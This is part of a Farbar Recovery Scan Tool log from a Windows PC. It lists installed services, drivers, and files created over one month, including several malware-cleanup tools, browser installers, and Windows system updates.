==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [227968 2013-02-26] (Qualcomm Atheros Commnucations) [File not signed]
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [226440 2016-01-20] (AVAST Software)
S2 BstHdAndroidSvc; c:\Program Files (x86)\BlueStacks\HD-Service.exe [393080 2013-01-07] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; c:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [384888 2013-01-07] (BlueStack Systems, Inc.)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2809072 2016-01-20] (Microsoft Corporation)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-12] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15344 2013-03-22] (Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [326760 2014-09-05] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [731648 2013-02-13] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [820184 2013-02-13] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-03-12] (Intel Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [178312 2015-09-25] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-03-12] (Intel Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-11-12] (LogMeIn, Inc.)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193144 2015-11-20] (Logitech Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 Micro Star SCM; C:\Program Files (x86)\SCM\MSIService.exe [160768 2013-04-18] (Micro-Star International Co., Ltd.) [File not signed]
R2 MSI_SuperCharger; C:\Program Files (x86)\MSI\Super-Charger\ChargeService.exe [154112 2013-02-08] (MSI) [File not signed]
S3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [3611808 2015-07-22] (INCA Internet Co., Ltd.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-12] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-12] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-12] (NVIDIA Corporation)
R2 Qualcomm Atheros Killer Service; C:\Program Files\Qualcomm Atheros\Killer Network Manager\BFNService.exe [495616 2013-03-15] () [File not signed]
S2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [1042304 2016-02-21] (Enigma Software Group USA, LLC.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [619904 2012-12-11] (Wacom Technology, Corp.)
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2013-02-25] (Atheros) [File not signed]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 akw8x64; C:\Windows\system32\DRIVERS\akw8x64.sys [3758800 2013-03-15] (Qualcomm Atheros, Inc.)
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [28656 2016-01-20] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [97648 2016-01-20] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2016-01-20] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65224 2016-01-20] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1065208 2016-01-20] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [464256 2016-01-20] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [155304 2016-01-20] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [273784 2016-01-20] (AVAST Software)
S1 BfLwf; C:\Windows\system32\DRIVERS\bwcW8x64.sys [74096 2013-03-15] (Qualcomm Atheros, Inc.)
S2 BstHdDrv; c:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [71032 2013-01-07] (BlueStack Systems)
S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-26] (Qualcomm Atheros)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [15920 2016-02-21] (Enigma Software Group USA, LLC.)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-02-21] ()
R3 Hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [45680 2015-11-12] (LogMeIn Inc.)
R3 Ke2200; C:\Windows\system32\DRIVERS\e22w8x64.sys [174448 2013-03-15] (Qualcomm Atheros, Inc.)
S3 LADF_BakerCOnly; C:\Windows\system32\DRIVERS\ladfBakerCamd64.sys [363096 2010-07-08] (Logitech)
S3 LADF_BakerROnly; C:\Windows\system32\DRIVERS\ladfBakerRamd64.sys [334552 2010-07-08] (Logitech)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
R3 lgLowAudio; C:\Windows\system32\drivers\lgLowAudio.sys [26264 2015-11-20] (Logitech Inc.)
S3 LGSHidFilt; C:\Windows\system32\DRIVERS\LGSHidFilt.Sys [64280 2013-05-30] (Logitech Inc.)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-02-27] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R1 nvkflt; C:\Windows\system32\DRIVERS\nvkflt.sys [307768 2016-01-23] (NVIDIA Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-01-12] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [448072 2013-04-24] (RTS Corporation)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [34544 2015-10-29] (Synaptics Incorporated)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2015-06-10] (Apple, Inc.) [File not signed]
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-27 02:11 - 2016-02-27 02:11 - 00031011 _____ C:\Users\Eirik\Desktop\FRST.txt
2016-02-26 00:48 - 2016-02-26 00:48 - 00242152 _____ C:\Users\Eirik\Downloads\Firefox Setup Stub 44.0.2 (3).exe
2016-02-25 22:28 - 2016-02-26 00:48 - 00001181 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-02-25 22:28 - 2016-02-26 00:48 - 00001169 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-02-25 22:28 - 2016-02-26 00:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-25 22:28 - 2016-02-26 00:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-25 22:27 - 2016-02-25 22:27 - 00242152 _____ C:\Users\Eirik\Downloads\Firefox Setup Stub 44.0.2 (2).exe
2016-02-25 21:00 - 2016-02-25 21:00 - 00001290 _____ C:\Users\Eirik\Desktop\Revo Uninstaller.lnk
2016-02-25 21:00 - 2016-02-25 21:00 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2016-02-25 21:00 - 2016-02-25 21:00 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2016-02-25 20:59 - 2016-02-25 20:59 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Eirik\Downloads\revosetup.exe
2016-02-23 23:52 - 2016-02-23 23:52 - 02870984 _____ (ESET) C:\Users\Eirik\Downloads\esetsmartinstaller_enu (1).exe
2016-02-23 23:28 - 2016-02-23 23:28 - 00001684 _____ C:\Users\Eirik\Desktop\MyEsetScan.txt
2016-02-23 20:01 - 2016-02-23 20:01 - 02870984 _____ (ESET) C:\Users\Eirik\Desktop\esetsmartinstaller_enu.exe
2016-02-23 20:00 - 2016-02-23 20:00 - 02870984 _____ (ESET) C:\Users\Eirik\Downloads\esetsmartinstaller_enu.exe
2016-02-22 22:57 - 2016-02-22 22:57 - 01511936 _____ C:\Users\Eirik\Downloads\adwcleaner_5.036.exe
2016-02-22 22:57 - 2016-02-22 22:57 - 01511936 _____ C:\Users\Eirik\Desktop\adwcleaner_5.036.exe
2016-02-22 22:48 - 2016-02-22 22:48 - 00000541 _____ C:\Users\Eirik\Desktop\JRT.txt
2016-02-22 22:16 - 2016-02-22 22:16 - 01609216 _____ (Malwarebytes) C:\Users\Eirik\Downloads\JRT (1).exe
2016-02-22 22:13 - 2016-02-22 22:13 - 01609216 _____ (Malwarebytes) C:\Users\Eirik\Desktop\JRT.exe
2016-02-22 22:01 - 2016-02-22 22:03 - 00012892 _____ C:\Users\Eirik\Desktop\Fixlog.txt
2016-02-22 18:03 - 2016-02-22 18:03 - 00001625 _____ C:\Users\Public\Desktop\League of Legends.lnk
2016-02-22 18:01 - 2016-02-22 18:01 - 30993712 _____ (Riot Games) C:\Users\Eirik\Downloads\LeagueofLegends_EUNE_Installer_9_15_2014.exe
2016-02-22 01:42 - 2016-02-22 01:42 - 00242152 _____ C:\Users\Eirik\Downloads\Firefox Setup Stub 44.0.2 (1).exe
2016-02-21 19:45 - 2016-02-23 23:27 - 00001359 _____ C:\Users\Eirik\Desktop\SpyHunter.lnk
2016-02-21 19:45 - 2016-02-22 16:44 - 00003254 _____ C:\WINDOWS\System32\Tasks\SpyHunter4Startup
2016-02-21 19:45 - 2016-02-21 19:45 - 00022704 _____ C:\WINDOWS\system32\Drivers\EsgScanner.sys
2016-02-21 19:45 - 2016-02-21 19:45 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Enigma Software Group
2016-02-21 19:45 - 2016-02-21 19:45 - 00000000 ____D C:\sh4ldr
2016-02-21 19:45 - 2016-02-21 19:45 - 00000000 ____D C:\Program Files\Enigma Software Group
2016-02-21 19:45 - 2016-02-21 19:45 - 00000000 _____ C:\autoexec.bat
2016-02-21 19:44 - 2016-02-21 19:44 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\Eirik\Downloads\SpyHunter-Installer.exe
2016-02-21 16:23 - 2016-02-21 16:23 - 02371072 _____ (Farbar) C:\Users\Eirik\Downloads\FRST64 (1).exe
2016-02-21 16:23 - 2016-02-21 16:23 - 02371072 _____ (Farbar) C:\Users\Eirik\Desktop\FRST64.exe
2016-02-21 16:23 - 2016-02-21 16:23 - 00000000 ____D C:\Users\Eirik\Documents\Egendefinerte Office-maler
2016-02-21 16:22 - 2016-02-27 02:11 - 00000000 ____D C:\FRST
2016-02-21 16:21 - 2016-02-21 16:21 - 02371072 _____ (Farbar) C:\Users\Eirik\Downloads\FRST64.exe
2016-02-21 16:21 - 2016-02-21 16:21 - 01722368 _____ (Farbar) C:\Users\Eirik\Downloads\FRST.exe
2016-02-21 15:20 - 2016-02-21 15:20 - 07194312 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (5).exe
2016-02-21 15:20 - 2016-02-21 15:20 - 06503984 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (5).exe
2016-02-21 15:20 - 2016-02-21 15:20 - 01420840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm (2).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 07186992 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (4).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 06554576 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (4).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 05673816 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (3).exe
2016-02-21 15:19 - 2016-02-21 15:19 - 01453976 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm (1).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04995416 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (3).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04961800 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (2).exe
2016-02-21 15:18 - 2016-02-21 15:18 - 04216840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (2).exe
2016-02-21 15:17 - 2016-02-21 15:17 - 03200960 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64 (1).exe
2016-02-21 15:16 - 2016-02-21 15:16 - 02723264 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86 (1).exe
2016-02-21 15:15 - 2016-02-21 15:15 - 07194312 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x64.exe
2016-02-21 15:15 - 2016-02-21 15:15 - 06503984 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_x86.exe
2016-02-21 15:15 - 2016-02-21 15:15 - 01420840 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vcredist_arm.exe
2016-02-21 15:14 - 2016-02-27 02:00 - 00000998 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-21 15:14 - 2016-02-26 15:19 - 00001002 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-21 15:14 - 2016-02-21 15:14 - 00003974 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-21 15:14 - 2016-02-21 15:14 - 00003738 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-02-21 15:14 - 2016-02-21 15:14 - 00002308 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-21 15:14 - 2016-02-21 15:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\Deployment
2016-02-21 15:14 - 2016-02-21 15:14 - 00000000 ____D C:\Users\Eirik\AppData\Local\Apps\2.0
2016-02-21 14:44 - 2016-02-21 15:20 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-21 14:44 - 2016-02-21 14:44 - 13767776 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\vc_redist.x86.exe
2016-02-21 13:44 - 2016-02-21 13:44 - 00242080 _____ C:\Users\Eirik\Downloads\Firefox Setup Stub 44.0.2.exe
2016-02-21 12:57 - 2016-02-27 01:58 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-02-21 12:56 - 2016-02-21 12:56 - 22908888 _____ (Malwarebytes ) C:\Users\Eirik\Downloads\mbam-setup-2.2.0.1024.exe
2016-02-21 12:56 - 2016-02-21 12:56 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-02-21 12:56 - 2016-02-21 12:56 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-02-21 12:56 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-02-21 12:56 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-02-21 12:56 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-02-21 12:46 - 2016-02-22 23:04 - 00000000 ____D C:\AdwCleaner
2016-02-21 12:46 - 2016-02-21 12:46 - 01511424 _____ C:\Users\Eirik\Downloads\adwcleaner_5.035.exe
2016-02-21 04:20 - 2016-02-21 04:20 - 00000000 ____D C:\Users\Eirik\Desktop\Gamle Firefox-data
2016-02-19 12:46 - 2016-02-19 12:46 - 00000000 ____D C:\Users\Eirik\AppData\Local\Jagex
2016-02-19 12:46 - 2016-02-19 12:46 - 00000000 ____D C:\ProgramData\Jagex
2016-02-19 12:44 - 2016-02-19 12:44 - 03269920 _____ (Jagex Ltd ) C:\Users\Eirik\Downloads\RuneScape-Setup.exe
2016-02-18 00:04 - 2016-02-18 00:04 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-02-17 13:06 - 2016-02-23 19:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2016-02-17 13:05 - 2016-02-23 19:00 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-02-17 13:05 - 2016-02-17 13:05 - 01113856 _____ (Microsoft Corporation) C:\Users\Eirik\Downloads\Setup.X86.nb-no_O365ProPlusRetail_a9a627a4-ddaa-4aab-9b90-4499b4a944e3_TX_PR_.exe
2016-02-17 12:17 - 2016-02-17 12:17 - 00000000 ____D C:\Users\Eirik\AppData\Roaming\GeoGebra 5.0
2016-02-15 14:58 - 2016-02-15 14:58 - 00005019 _____ C:\Users\Eirik\Downloads\replay_1346256955.bat
2016-02-13 01:48 - 2016-02-13 01:48 - 00000000 ____D C:\ProgramData\WinZip
2016-02-13 01:45 - 2016-02-13 01:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-13 01:45 - 2016-02-13 01:49 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-12 02:51 - 2016-02-06 11:48 - 25839104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-12 02:51 - 2016-02-06 11:24 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-02-12 02:51 - 2016-02-06 11:01 - 20366848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-12 02:51 - 2016-02-06 10:43 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-02-12 02:51 - 2016-02-06 10:32 - 14458368 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-12 02:51 - 2016-02-06 10:16 - 12857856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-12 02:51 - 2016-02-06 10:09 - 01547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-12 02:51 - 2016-02-06 09:54 - 01312256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 10:44 - 2016-01-22 09:01 - 22365992 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-02-10 10:44 - 2016-01-22 08:11 - 19794896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-02-10 10:44 - 2016-01-22 06:25 - 14467072 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 10:44 - 2016-01-22 06:14 - 12879360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 10:44 - 2016-01-15 02:42 - 00033472 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-02-10 10:44 - 2016-01-14 21:44 - 01362944 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 01162240 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00677376 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-02-10 10:44 - 2016-01-14 21:44 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-02-10 10:44 - 2016-01-10 20:37 - 00442720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-02-10 10:44 - 2016-01-10 19:39 - 00332640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-02-10 10:44 - 2016-01-10 19:15 - 00401920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-02-10 10:44 - 2016-01-10 19:15 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-02-10 10:44 - 2016-01-10 18:50 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll
2016-02-10 10:44 - 2016-01-10 18:43 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2016-02-10 10:44 - 2016-01-10 18:31 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 10:44 - 2016-01-10 18:16 - 00898048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-02-10 10:44 - 2016-01-10 18:14 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-10 10:44 - 2016-01-10 18:12 - 00532480 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll
2016-02-10 10:44 - 2016-01-10 18:09 - 01442304 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-10 10:44 - 2016-01-10 18:09 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2016-02-10 10:44 - 2016-01-10 18:02 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 10:44 - 2016-01-10 17:58 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 10:44 - 2016-01-10 17:56 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll
2016-02-10 10:44 - 2016-01-10 17:51 - 00702976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2016-02-10 10:44 - 2016-01-10 17:49 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EncDec.dll
2016-02-10 10:44 - 2016-01-10 17:43 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 10:44 - 2016-01-10 17:40 - 00116736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 10:44 - 2016-01-07 19:34 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-02-10 10:44 - 2015-12-29 16:45 - 07783936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 10:44 - 2015-12-29 16:45 - 07075328 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll
2016-02-10 10:44 - 2015-12-29 16:43 - 05267968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll
2016-02-10 10:44 - 2015-12-29 16:42 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 10:43 - 2016-01-22 07:40 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-02-10 10:43 - 2016-01-22 07:29 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 10:43 - 2016-01-22 07:28 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 10:43 - 2016-01-22 07:27 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2016-02-10 10:43 - 2016-01-22 07:02 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-02-10 10:43 - 2016-01-22 06:55 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-02-10 10:43 - 2016-01-22 06:52 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 10:43 - 2016-01-22 06:51 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2016-02-10 10:43 - 2016-01-22 06:50 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2016-02-10 10:43 - 2016-01-22 06:48 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-02-10 10:43 - 2016-01-22 06:48 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-02-10 10:43 - 2016-01-22 06:47 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-02-10 10:43 - 2016-01-22 06:46 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-02-10 10:43 - 2016-01-22 06:35 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 10:43 - 2016-01-22 06:31 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 10:43 - 2016-01-22 06:31 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2016-02-10 10:43 - 2016-01-22 06:28 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-02-10 10:43 - 2016-01-22 06:27 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2016-02-10 10:43 - 2016-01-22 06:25 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-02-10 10:43 - 2016-01-22 06:25 - 00325632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-02-10 10:43 - 2016-01-22 06:24 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-02-10 10:43 - 2016-01-22 06:08 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-02-10 10:43 - 2016-01-22 06:07 - 02778624 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-02-10 10:43 - 2016-01-22 06:07 - 02120704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 10:43 - 2016-01-22 06:02 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-02-10 10:43 - 2016-01-22 05:58 - 02464256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2016-02-10 10:43 - 2016-01-19 20:14 - 07453024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-02-10 10:43 - 2016-01-19 20:13 - 02175008 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
